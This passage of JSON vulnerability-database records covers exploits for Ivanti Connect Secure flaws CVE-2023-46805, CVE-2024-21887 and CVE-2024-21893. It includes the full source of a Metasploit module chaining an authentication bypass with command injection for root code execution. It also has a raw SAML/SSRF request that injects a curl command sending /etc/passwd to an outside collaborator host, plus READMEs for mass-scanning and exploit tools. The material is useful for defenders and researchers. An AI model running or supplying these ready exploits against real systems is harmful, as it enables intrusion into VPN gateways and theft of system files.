for display purposes, we don't need to test the version information.\n\n    json_data = res.get_json_document\n\n    name = json_data.dig('software-inventory', 'software', 'name')\n\n    version = json_data.dig('software-inventory', 'software', 'version')\n\n    build = json_data.dig('software-inventory', 'software', 'build')\n\n    # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if\n    # get_json_document could not parse the JSON (and will return an empty Hash).\n    return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?\n\n    Exploit::CheckCode::Vulnerable(\"#{name} #{version} (#{build})\")\n  end\n\n  def exploit\n    send_request_cgi(\n      'method' => 'POST',\n      'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',\n      'ctype' => 'application/json',\n      'data' => {\n        'type' => \";#{payload.encoded} #\",\n        'txtGCPProject' => Rex::Text.rand_text_alpha(8),\n        'txtGCPSecret' => Rex::Text.rand_text_alpha(8),\n        'txtGCPPath' => Rex::Text.rand_text_alpha(8),\n        'txtGCPBucket' => Rex::Text.rand_text_alpha(8)\n      }.to_json\n    )\n  end\nend\n",
            "ai_score": {
                "value": 8.8,
                "uncertanity": 2.2,
                "vector": "NONE"
            }
        },
        {
            "id": "140A9C1C-31CF-5F6B-8425-FE1B5620B837",
            "type": "githubexploit",
            "bulletinFamily": "exploit",
            "title": "Exploit for Command Injection in Ivanti Connect Secure",
            "description": "# \ud83d\udea8 CVE-2024-21887 Exploit Tool \ud83d\udee0\ufe0f\n\nA robust tool for detecting and exploiting the CVE-2024-21887 vulnerability in Ivanti Connect and Policy Secure systems.\n\n## \ud83d\udcdd Description\n\nCVE-2024-21887 is a critical command injection vulnerability, allowing authenticated admins to execute arbitrary commands. This tool aids in identifying and interacting with affected systems.\n\n## \ud83d\ude80 Features\n\n- **Single URL Scan**: Pinpoint focus on a single target.\n- **Bulk Scanning**: Analyze multiple URLs from a file.\n- **Thread Control**: Customize concurrent scanning with thread options.\n- **Output Logging**: Save identified vulnerable URLs to a file.\n\n## \ud83d\udcda How to Use\n\n1. Install dependencies: `pip install -r requirements.txt`\n2. Run the tool:\n   - Single URL: `python exploit.py -u <URL>`\n   - Bulk scan: `python exploit.py -f <file-path>`\n   - With threads: `python exploit.py -f <file-path> -t <number-of-threads>`\n   - Save output: `python exploit.py -f <file-path> -o <output-file-path>`\n\n\u26a0\ufe0f **Disclaimer**: This tool is provided for educational and ethical testing purposes only. I am not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test.\n",
            "published": "2024-01-20T19:15:23",
            "modified": "2024-01-21T12:09:30",
            "cvss": {
                "score": 5.8,
                "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "MULTIPLE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "PARTIAL",
                    "baseScore": 5.8
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 6.4,
                "impactScore": 6.4,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 2.3,
                "impactScore": 6.0,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "HIGH",
                    "userInteraction": "NONE",
                    "scope": "CHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH",
                    "baseScore": 9.1,
                    "baseSeverity": "CRITICAL"
                }
            },
            "href": "https://github.com/tucommenceapousser/CVE-2024-21887",
            "cvelist": [
                "CVE-2024-21887"
            ],
            "lastseen": "2024-02-12T15:15:52",
            "ai_score": {
                "value": 8.2,
                "uncertanity": 1.7,
                "vector": "NONE"
            }
        },
        {
            "id": "1CBA6E14-5A29-5E20-B64D-BA04F0DC2C45",
            "type": "githubexploit",
            "bulletinFamily": "exploit",
            "title": "Exploit for Improper Authentication in Ivanti Connect Secure",
            "description": "19/01/2024 ***** Update *******\nUpdated with the latest info based on Assetnote's blog. \nNow three checks are executed before a status is shown, this also to better detect older versions of Avanti\n\nBlogs with analysis of the CVE:\nhttps://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis\nhttps://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce\n\n# CVE-2023-46805\nSimple scanner for scanning a list of ip-addresses for vulnerable Ivanti Pulse Secure devices\n\n1. Scan a service like Shodan or Censys for the relevant devices and create a list of ip_adresses.\n2. Save them to \"ip_list.txt\" and in the same folder as this script\n3. run the script and it will show output to screen and save to a csv file once finished\n\n",
            "published": "2024-01-16T08:05:58",
            "modified": "2024-01-30T08:26:45",
            "cvss": {
                "score": 6.4,
                "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "NONE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "NONE",
                    "baseScore": 6.4
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 10.0,
                "impactScore": 4.9,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 3.9,
                "impactScore": 4.2,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "LOW",
                    "availabilityImpact": "NONE",
                    "baseScore": 8.2,
                    "baseSeverity": "HIGH"
                }
            },
            "href": "https://github.com/cbeek-r7/CVE-2023-46805",
            "cvelist": [
                "CVE-2023-46805"
            ],
            "lastseen": "2024-02-12T15:16:56",
            "ai_score": {
                "value": 9.0,
                "uncertanity": 0.2,
                "vector": "NONE"
            }
        },
        {
            "id": "6506C020-5958-5996-9B02-569C9EF08B42",
            "type": "githubexploit",
            "bulletinFamily": "exploit",
            "title": "Exploit for Server-Side Request Forgery in Ivanti Connect Secure",
            "description": "CVE-2024-21893 is  server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n\nrun `python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com`\n\n![image](https://github.com/h4x0r-dz/CVE-2024-21893.py/assets/26070859/bec33c87-a6c7-4db3-aedc-5749e994c917)\n\n![image](https://github.com/h4x0r-dz/CVE-2024-21893.py/assets/26070859/c38f93de-379b-4b76-8326-e66c019dfa2a)\n\n### RCE \n\n```\nPOST /dana-ws/saml20.ws HTTP/1.1\nHost: target.com\nAccept: */*\nContent-Type: text/xml\nContent-Length: 934\nConnection: close\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n\t<soap:Body>\n\t\t<ds:Signature\n\t\txmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n\t\t\t<ds:SignedInfo>\n\t\t\t\t<ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/>\n\t\t\t\t<ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/>\n\t\t\t</ds:SignedInfo>\n\t\t\t<ds:SignatureValue>qwerty</ds:SignatureValue>\n\t\t\t<ds:KeyInfo xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.w3.org/2000/09/xmldsig\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n\t\t\t\t<ds:RetrievalMethod URI=\"http://127.0.0.1:8090/api/v1/license/keys-status/%3bcurl%20-X%20POST%20-d%20%40%2fetc%2fpasswd%20http%3a%2f%2f8oxxxxxxxxxxxxx.oastify.com%3b\"/>\n\t\t\t\t<ds:X509Data/>\n\t\t\t</ds:KeyInfo>\n\t\t\t<ds:Object></ds:Object>\n\t\t</ds:Signature>\n\t</soap:Body>\n</soap:Envelope>\n\n```\n\n![image](https://github.com/h4x0r-dz/CVE-2024-21893.py/assets/26070859/e7d7180a-b158-4437-9dd9-97d4c55539c9)\n\n\nReference : https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis \n",
            "published": "2024-02-02T22:59:21",
            "modified": "2024-02-12T01:28:50",
            "cvss": {
                "score": 6.4,
                "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "NONE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "NONE",
                    "baseScore": 6.4
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 10.0,
                "impactScore": 4.9,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 3.9,
                "impactScore": 4.2,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "LOW",
                    "availabilityImpact": "NONE",
                    "baseScore": 8.2,
                    "baseSeverity": "HIGH"
                }
            },
            "href": "https://github.com/h4x0r-dz/CVE-2024-21893.py",
            "cvelist": [
                "CVE-2024-21893"
            ],
            "lastseen": "2024-02-12T15:13:47",
            "ai_score": {
                "value": 7.2,
                "uncertanity": 2.4,
                "vector": "NONE"
            }
        },
        {
            "id": "8859BDA5-3AF8-5282-B64F-94D52BB81510",
            "type": "githubexploit",
            "bulletinFamily": "exploit",
            "title": "Exploit for Improper Authentication in Ivanti Connect Secure",
            "description": "\n**Title: Proof of Concept for CVE-2023-46805 - For Educational Use Only**\n\n**License:** This work is placed under the [Creative Commons Attribution 4.0 International License (CC BY 4.0)](https://creativecommons.org/licenses/by/4.0/). You are free to share, copy, distribute, and transmit this work, to adapt it or use it for other purposes, provided the authorship is appropriately attributed.\n\n**Disclaimer:** This Proof of Concept (PoC) is provided for educational and cybersecurity research purposes only. Neither the author, the affiliated organization, nor any other party involved in the creation, production, or delivery of this content will be liable for any damages, including, but not limited to, direct, indirect, incidental, special, consequential, or punitive damages arising from the use or inability to use this content.\n\n**Educational Objective:** This PoC is intended to aid the cybersecurity community in understanding and mitigating the vulnerability identified as CVE-2023-46805. It should not be used in a production environment or for malicious activities.\n\n**Vulnerability Description:** Ivanti RCE\n\n**PoC Details:** \n\n```bash\nUsage of ./CVE-Ivanti:\n  -cmd string\n        The command to replace 'id' in the payload (default \"id\")\n  -t int\n        Number of concurrent threads (default 5)\n\n```\n\n```bash\ngo build\necho \"https://1.2.3.4\" | ./CVE-Ivanti\nhttps://1.2.3.4 {\"error\": \"uid=0(root) gid=0(root) groups=0(root)\\n\"}\n\ncat myscope.txt -t 5 | ./CVE-Ivanti\nhttps://ssl1.mysite.com:443 {\"error\": \"uid=0(root) gid=0(root) groups=0(root)\\n\"}\nhttps://ssl3.mysite.com:443 {\"error\": \"uid=0(root) gid=0(root) groups=0(root)\\n\"}\n\necho \"https://1.2.3.4\" | ./CVE-Ivanti -cmd 'ls /'\n```\n",
            "published": "2024-01-25T14:53:16",
            "modified": "2024-01-31T02:24:37",
            "cvss": {
                "score": 6.4,
                "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "NONE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "NONE",
                    "baseScore": 6.4
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 10.0,
                "impactScore": 4.9,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 3.9,
                "impactScore": 4.2,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "LOW",
                    "availabilityImpact": "NONE",
                    "baseScore": 8.2,
                    "baseSeverity": "HIGH"
                }
            },
            "href": "https://github.com/w2xim3/CVE-2023-46805",
            "cvelist": [
                "CVE-2023-46805"
            ],
            "lastseen": "2024-02-12T15:14:56",
            "ai_score": {
                "value": 8.6,
                "uncertanity": 0.1,
                "vector": "NONE"
            }
        },
        {
            "id": "A559D688-3B3F-5C2E-8524-DE9364606561",
            "type": "githubexploit",
            "bulletinFamily": "exploit",
            "title": "Exploit for Improper Authentication in Ivanti Connect Secure",
            "description": "# \ud83d\udea8 CVE-2023-46805 Scanner Tool \ud83d\udee0\ufe0f\n\nA robust tool for detecting the CVE-2023-46805 vulnerability in Ivanti Pulse Connect Secure systems. This tool is inspired by the high-signal detection methods developed by AssetNote, focusing on authentication bypass vulnerabilities in these systems.\n\n## \ud83d\udcdd Description\n\nCVE-2023-46805 is a critical vulnerability that allows unauthorized bypass of authentication mechanisms in certain Ivanti Pulse Connect Secure versions. This tool aids in identifying affected systems, leveraging detection techniques based on AssetNote's research. \n\nFor more details on the methodology, see AssetNote's research: [High-Signal Detection and Exploitation of Ivanti\u2019s Pulse Connect Secure Auth Bypass](https://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce)\n\n## \ud83d\ude80 Features\n\n- **Single URL Scan**: Focus on a single target for quick assessment.\n- **Bulk Scanning**: Analyze multiple URLs from a file for widespread assessment.\n- **Thread Control**: Customize concurrent scanning with adjustable thread options.\n- **Output Logging**: Save identified potentially vulnerable URLs to a file.\n\n## \ud83d\udcda How to Use\n\n1. Install dependencies: `pip install -r requirements.txt`\n2. Run the tool:\n   - Single URL: `python scanner.py -u <URL>`\n   - Bulk scan: `python scanner.py -f <file-path>`\n   - With threads: `python scanner.py -f <file-path> -t <number-of-threads>`\n   - Save output: `python scanner.py -f <file-path> -o <output-file-path>`\n\n\u26a0\ufe0f **Disclaimer**: This tool is provided for educational and ethical testing purposes only. The author is not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test.\n",
            "published": "2024-01-19T02:23:13",
            "modified": "2024-01-23T21:09:42",
            "cvss": {
                "score": 6.4,
                "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "NONE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "NONE",
                    "baseScore": 6.4
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 10.0,
                "impactScore": 4.9,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 3.9,
                "impactScore": 4.2,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "LOW",
                    "availabilityImpact": "NONE",
                    "baseScore": 8.2,
                    "baseSeverity": "HIGH"
                }
            },
            "href": "https://github.com/Chocapikk/CVE-2023-46805",
            "cvelist": [
                "CVE-2023-46805"
            ],
            "lastseen": "2024-02-12T15:17:24",
            "ai_score": {
                "value": 7.5,
                "uncertanity": 3.0,
                "vector": "NONE"
            }
        },
        {
            "id": "B529BDE5-C872-5C41-81E2-63068A3535D0",
            "type": "githubexploit",
            "bulletinFamily": "exploit",
            "title": "Exploit for Command Injection in Ivanti Connect Secure",
            "description": "# \ud83d\udea8 CVE-2024-21887 Exploit Tool \ud83d\udee0\ufe0f\n\nA robust tool for detecting and exploiting the CVE-2024-21887 vulnerability in Ivanti Connect and Policy Secure systems.\n\n## \ud83d\udcdd Description\n\nCVE-2024-21887 is a critical command injection vulnerability, allowing authenticated admins to execute arbitrary commands. This tool aids in identifying and interacting with affected systems.\n\n## \ud83d\ude80 Features\n\n- **Single URL Scan**: Pinpoint focus on a single target.\n- **Bulk Scanning**: Analyze multiple URLs from a file.\n- **Thread Control**: Customize concurrent scanning with thread options.\n- **Output Logging**: Save identified vulnerable URLs to a file.\n\n## \ud83d\udcda How to Use\n\n1. Install dependencies: `pip install -r requirements.txt`\n2. Run the tool:\n   - Single URL: `python exploit.py -u <URL>`\n   - Bulk scan: `python exploit.py -f <file-path>`\n   - With threads: `python exploit.py -f <file-path> -t <number-of-threads>`\n   - Save output: `python exploit.py -f <file-path> -o <output-file-path>`\n\n\u26a0\ufe0f **Disclaimer**: This tool is provided for educational and ethical testing purposes only. I am not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test.\n",
            "published": "2024-01-16T20:59:38",
            "modified": "2024-02-12T12:56:01",
            "cvss": {
                "score": 5.8,
                "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "MULTIPLE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "PARTIAL",
                    "baseScore": 5.8
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 6.4,
                "impactScore": 6.4,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 2.3,
                "impactScore": 6.0,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "HIGH",
                    "userInteraction": "NONE",
                    "scope": "CHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH",
                    "baseScore": 9.1,
                    "baseSeverity": "CRITICAL"
                }
            },
            "href": "https://github.com/Chocapikk/CVE-2024-21887",
            "cvelist": [
                "CVE-2024-21887"
            ],
            "lastseen": "2024-02-12T15:16:47",
            "ai_score": {
                "value": 8.2,
                "uncertanity": 1.7,
                "vector": "NONE"
            }
        },
        {
            "id": "MSF:EXPLOIT-LINUX-HTTP-IVANTI_CONNECT_SECURE_RCE_CVE_2023_46805-",
            "type": "metasploit",
            "bulletinFamily": "exploit",
            "title": "Ivanti Connect Secure Unauthenticated Remote Code Execution",
            "description": "This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.\n",
            "published": "2024-01-16T14:32:48",
            "modified": "2024-01-18T15:35:43",
            "cvss": {
                "score": 6.4,
                "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "NONE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "NONE",
                    "baseScore": 6.4
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 10.0,
                "impactScore": 4.9,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 2.3,
                "impactScore": 6.0,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "HIGH",
                    "userInteraction": "NONE",
                    "scope": "CHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH",
                    "baseScore": 9.1,
                    "baseSeverity": "CRITICAL"
                }
            },
            "href": "https://www.rapid7.com/db/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805/",
            "cvelist": [
                "CVE-2023-46805",
                "CVE-2024-21887"
            ],
            "lastseen": "2024-02-12T13:24:08",
            "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb",
            "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',\n        'Description' => %q{\n          This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection\n          vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti\n          Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and\n          22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are\n          also vulnerable.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'sfewer-r7', # MSF Exploit & Rapid7 Analysis\n        ],\n        'References' => [\n          ['CVE', '2023-46805'], # The auth bypass vulnerability.\n          ['CVE', '2024-21887'], # The command injection vulnerability.\n          ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],\n          ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']\n        ],\n        'DisclosureDate' => '2024-01-10',\n        'Platform' => %w[linux unix],\n        'Arch' => [ARCH_CMD],\n        'Privileged' => true, # Code execution as root.\n        'Targets' => [\n          [\n            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n            # cmd/linux/http/x64/meterpreter/reverse_tcp\n            # cmd/linux/http/x64/shell/reverse_tcp\n            # cmd/linux/http/x86/shell/reverse_tcp\n            'Linux Command',\n            {\n              'Platform' => 'linux',\n              'Arch' => [ARCH_CMD]\n            },\n          ],\n          [\n            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n            # cmd/unix/python/meterpreter/reverse_tcp\n            # cmd/unix/reverse_bash\n            # cmd/unix/reverse_python\n            'Unix Command',\n            {\n              'Platform' => 'unix',\n              'Arch' => [ARCH_CMD]\n            },\n          ]\n        ],\n        'DefaultOptions' => {\n          'RPORT' => 443,\n          'SSL' => true,\n          'FETCH_WRITABLE_DIR' => '/tmp'\n        },\n        'DefaultTarget' => 0,\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS]\n        }\n      )\n    )\n  end\n\n  def check\n    # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve\n    # the target system version information. If this requests succeeds, the target is vulnerable.\n    res = send_request_cgi(\n      'method' => 'GET',\n      'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'\n    )\n\n    return CheckCode::Unknown('Connection failed') unless res\n\n    # If the vendor mitigation has been applied, the request will return 403 Forbidden.\n    return CheckCode::Safe if res.code != 200\n\n    # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON\n    # response, this is only for display purposes, we don't need to test the version information.\n\n    json_data = res.get_json_document\n\n    name = json_data.dig('software-inventory', 'software', 'name')\n\n    version = json_data.dig('software-inventory', 'software', 'version')\n\n    build = json_data.dig('software-inventory', 'software', 'build')\n\n    # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if\n    # get_json_document could not parse the JSON (and will return an empty Hash).\n    return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?\n\n    Exploit::CheckCode::Vulnerable(\"#{name} #{version} (#{build})\")\n  end\n\n  def exploit\n    send_request_cgi(\n      'method' => 'POST',\n      'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',\n      'ctype' => 'application/json',\n      'data' => {\n        'type' => \";#{payload.encoded} #\",\n        'txtGCPProject' => Rex::Text.rand_text_alpha(8),\n        'txtGCPSecret' => Rex::Text.rand_text_alpha(8),\n        'txtGCPPath' => Rex::Text.rand_text_alpha(8),\n        'txtGCPBucket' => Rex::Text.rand_text_alpha(8)\n      }.to_json\n    )\n  end\nend\n",
            "ai_score": {
                "value": 8.8,
                "uncertanity": 2.2,
                "vector": "NONE"
            }
        },
        {
            "id": "PACKETSTORM:176668",
            "type": "packetstorm",
            "bulletinFamily": "exploit",
            "title": "Ivanti Connect Secure Unauthenticated Remote Code Execution",
            "description": "",
            "published": "2024-01-22T00:00:00",
            "modified": "2024-01-22T00:00:00",
            "cvss": {
                "score": 6.4,
                "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "NONE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "NONE",
                    "baseScore": 6.4
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 10.0,
                "impactScore": 4.9,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 2.3,
                "impactScore": 6.0,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "HIGH",
                    "userInteraction": "NONE",
                    "scope": "CHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH",
                    "baseScore": 9.1,
                    "baseSeverity": "CRITICAL"
                }
            },
            "href": "https://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html",
            "cvelist": [
                "CVE-2023-46805",
                "CVE-2024-21887"
            ],
            "lastseen": "2024-01-22T16:02:50",
            "sourceHref": "https://packetstormsecurity.com/files/download/176668/ivanti_connect_secure_rce_cve_2023_46805.rb.txt",
